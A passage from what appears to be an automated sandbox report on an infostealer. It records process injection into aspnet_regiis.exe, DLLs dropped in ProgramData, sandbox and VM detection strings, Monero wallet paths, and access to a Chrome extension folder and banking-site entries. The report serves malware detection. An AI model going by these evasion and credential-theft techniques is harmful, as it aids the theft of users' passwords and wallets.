                          Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: aspnet_regiis.exe, 00000003.00000002.2594589461.000000002E429000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.3.dr
                          Source: Binary string: nss3.pdb source: aspnet_regiis.exe, 00000003.00000002.2608149755.000000006CE5F000.00000002.00000001.01000000.0000000B.sdmp, aspnet_regiis.exe, 00000003.00000002.2601605358.000000004027E000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.3.dr
                          Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: aspnet_regiis.exe, 00000003.00000002.2588862570.0000000021FD8000.00000002.00001000.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2585478276.000000001C060000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: mozglue.pdb source: aspnet_regiis.exe, 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmp, aspnet_regiis.exe, 00000003.00000002.2591928483.00000000284BB000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.3.dr
                          Source: Binary string: softokn3.pdb source: aspnet_regiis.exe, 00000003.00000002.2596888465.0000000034393000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr

                          Data Obfuscation

                          barindex
                          Detected unpacking (changes PE section rights)
                          Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.380000.0.unpack 25W~Dos:EW;.text:ER;.rsrc:R;.reloc:R;Unknown_Section4:ER; vs Unknown_Section0:EW;Unknown_Section1:ER;Unknown_Section2:R;Unknown_Section3:R;Unknown_Section4:ER;
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_00418950 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,3_2_00418950
                          Source: file.exeStatic PE information: section name: 25W~Dos
                          Source: file.exeStatic PE information: section name:
                          Source: msvcp140.dll.3.drStatic PE information: section name: .didat
                          Source: softokn3.dll.3.drStatic PE information: section name: .00cfg
                          Source: nss3.dll.3.drStatic PE information: section name: .00cfg
                          Source: freebl3.dll.3.drStatic PE information: section name: .00cfg
                          Source: mozglue.dll.3.drStatic PE information: section name: .00cfg
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003D8EDD push ss; ret 0_2_003D8FBA
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D7697F1 push ecx; ret 0_2_6D769804
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0042F142 push ecx; ret 3_2_0042F155
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_00422D3B push esi; ret 3_2_00422D3D
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0041DDB5 push ecx; ret 3_2_0041DDC8
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_00432715 push 0000004Ch; iretd 3_2_00432726
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CC5B536 push ecx; ret 3_2_6CC5B549
                          Source: file.exeStatic PE information: section name: 25W~Dos entropy: 7.999495427642678
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\msvcp110.dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_00418950 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,3_2_00418950
                          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                          Malware Analysis System Evasion

                          barindex
                          Yara detected AntiVM3
                          Source: Yara matchFile source: 3.2.aspnet_regiis.exe.400000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 3.2.aspnet_regiis.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.file.exe.6d771000.7.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.file.exe.6d771000.7.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.file.exe.6d740000.4.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000002.1358313297.000000006D771000.00000004.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: file.exe PID: 7500, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: aspnet_regiis.exe PID: 7620, type: MEMORYSTR
                          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                          Source: aspnet_regiis.exeBinary or memory string: DIR_WATCH.DLL
                          Source: aspnet_regiis.exeBinary or memory string: SBIEDLL.DLL
                          Source: aspnet_regiis.exeBinary or memory string: API_LOG.DLL
                          Source: aspnet_regiis.exe, 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: INMPM20IXQUGN9:-?5(\C!7%{->^WALLET_PATHSOFTWARE\MONERO-PROJECT\MONERO-CORE.KEYS\MONERO\WALLET.KEYS\\\*.*\\...\\\\\\\\\\\\HAL9THJOHNDOEDISPLAYAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL16:07:4116:07:4116:07:4116:07:4116:07:4116:07:41DELAYS.TMP%S%SNTDLL.DLL
                          Source: C:\Users\user\Desktop\file.exeMemory allocated: C20000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\Desktop\file.exeMemory allocated: 2780000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\Desktop\file.exeMemory allocated: 25D0000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\Desktop\file.exeMemory allocated: 4E00000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\Desktop\file.exeMemory allocated: 5E00000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\Desktop\file.exeMemory allocated: 5F30000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\Desktop\file.exeMemory allocated: 6F30000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\Desktop\file.exeMemory allocated: 7280000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\Desktop\file.exeMemory allocated: 8280000 memory reserve | memory write watchJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: OpenInputDesktop,SetThreadDesktop,GetCursorPos,GetCursorPos,Sleep,Sleep,GetCursorPos,Sleep,Sleep,GetCursorPos,3_2_0040180D
                          Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeWindow / User API: threadDelayed 894Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeWindow / User API: threadDelayed 1967Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDropped PE file which has not been started: C:\ProgramData\nss3.dllJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\msvcp110.dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDropped PE file which has not been started: C:\ProgramData\freebl3.dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDropped PE file which has not been started: C:\ProgramData\softokn3.dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeAPI coverage: 9.5 %
                          Source: C:\Users\user\Desktop\file.exe TID: 7560Thread sleep time: -922337203685477s >= -30000sJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_00410DDB GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 00410EEEh3_2_00410DDB
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D762CBD FindFirstFileExW,0_2_6D762CBD
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0041543D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,3_2_0041543D
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_00414CC8 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcatA,strtok_s,strtok_s,_memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,strtok_s,FindNextFileA,FindClose,3_2_00414CC8
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_00409D1C FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_00409D1C
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0040D5C6 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_0040D5C6
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0040B5DF FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,3_2_0040B5DF
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_00401D80 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_00401D80
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0040BF4D FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,3_2_0040BF4D
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_00415FD1 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_00415FD1
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0040B93F FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_0040B93F
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_00415B0B GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,3_2_00415B0B
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0040CD37 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,3_2_0040CD37
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_00415142 GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,3_2_00415142
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_00410FBA GetSystemInfo,wsprintfA,3_2_00410FBA
                          Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                          Source: Amcache.hve.3.drBinary or memory string: VMware
                          Source: FHCGHJ.3.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
                          Source: FHCGHJ.3.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
                          Source: FHCGHJ.3.drBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
                          Source: FHCGHJ.3.drBinary or memory string: outlook.office.comVMware20,11696492231s
                          Source: FHCGHJ.3.drBinary or memory string: AMC password management pageVMware20,11696492231
                          Source: Amcache.hve.3.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                          Source: FHCGHJ.3.drBinary or memory string: interactivebrokers.comVMware20,11696492231
                          Source: FHCGHJ.3.drBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
                          Source: aspnet_regiis.exe, 00000003.00000002.2579771123.0000000003108000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.0000000003167000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                          Source: FHCGHJ.3.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
                          Source: FHCGHJ.3.drBinary or memory string: outlook.office365.comVMware20,11696492231t
                          Source: Amcache.hve.3.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                          Source: FHCGHJ.3.drBinary or memory string: discord.comVMware20,11696492231f
                          Source: Amcache.hve.3.drBinary or memory string: vmci.sys
                          Source: FHCGHJ.3.drBinary or memory string: global block list test formVMware20,11696492231
                          Source: FHCGHJ.3.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
                          Source: FHCGHJ.3.drBinary or memory string: bankofamerica.comVMware20,11696492231x
                          Source: FHCGHJ.3.drBinary or memory string: tasks.office.comVMware20,11696492231o
                          Source: Amcache.hve.3.drBinary or memory string: VMware20,1
                          Source: Amcache.hve.3.drBinary or memory string: Microsoft Hyper-V Generation Counter
                          Source: Amcache.hve.3.drBinary or memory string: NECVMWar VMware SATA CD00
                          Source: Amcache.hve.3.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                          Source: aspnet_regiis.exe, 00000003.00000002.2579771123.0000000003108000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                          Source: FHCGHJ.3.drBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
                          Source: Amcache.hve.3.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                          Source: Amcache.hve.3.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                          Source: Amcache.hve.3.drBinary or memory string: VMware PCI VMCI Bus Device
                          Source: FHCGHJ.3.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
                          Source: Amcache.hve.3.drBinary or memory string: VMware VMCI Bus Device
                          Source: Amcache.hve.3.drBinary or memory string: VMware Virtual RAM
                          Source: Amcache.hve.3.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                          Source: FHCGHJ.3.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
                          Source: Amcache.hve.3.drBinary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
                          Source: FHCGHJ.3.drBinary or memory string: turbotax.intuit.comVMware20,11696492231t
                          Source: FHCGHJ.3.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
                          Source: FHCGHJ.3.drBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
                          Source: Amcache.hve.3.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                          Source: FHCGHJ.3.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
                          Source: Amcache.hve.3.drBinary or memory string: VMware Virtual USB Mouse
                          Source: FHCGHJ.3.drBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
                          Source: Amcache.hve.3.drBinary or memory string: vmci.syshbin
                          Source: Amcache.hve.3.drBinary or memory string: VMware, Inc.
                          Source: Amcache.hve.3.drBinary or memory string: VMware20,1hbin@
                          Source: Amcache.hve.3.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                          Source: FHCGHJ.3.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
                          Source: Amcache.hve.3.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                          Source: Amcache.hve.3.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                          Source: FHCGHJ.3.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
                          Source: FHCGHJ.3.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
                          Source: FHCGHJ.3.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
                          Source: Amcache.hve.3.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                          Source: Amcache.hve.3.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                          Source: aspnet_regiis.exe, 00000003.00000002.2579771123.0000000003242000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                          Source: FHCGHJ.3.drBinary or memory string: dev.azure.comVMware20,11696492231j
                          Source: FHCGHJ.3.drBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
                          Source: Amcache.hve.3.drBinary or memory string: vmci.syshbin`
                          Source: Amcache.hve.3.drBinary or memory string: \driver\vmci,\driver\pci
                          Source: FHCGHJ.3.drBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                          Source: Amcache.hve.3.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                          Source: Amcache.hve.3.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                          Source: FHCGHJ.3.drBinary or memory string: ms.portal.azure.comVMware20,11696492231
                          Source: FHCGHJ.3.drBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeAPI call chain: ExitProcess graph end nodegraph_3-72747
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeAPI call chain: ExitProcess graph end nodegraph_3-72763
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeAPI call chain: ExitProcess graph end nodegraph_3-74087
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeProcess information queried: ProcessInformationJump to behavior
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D760D6C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6D760D6C
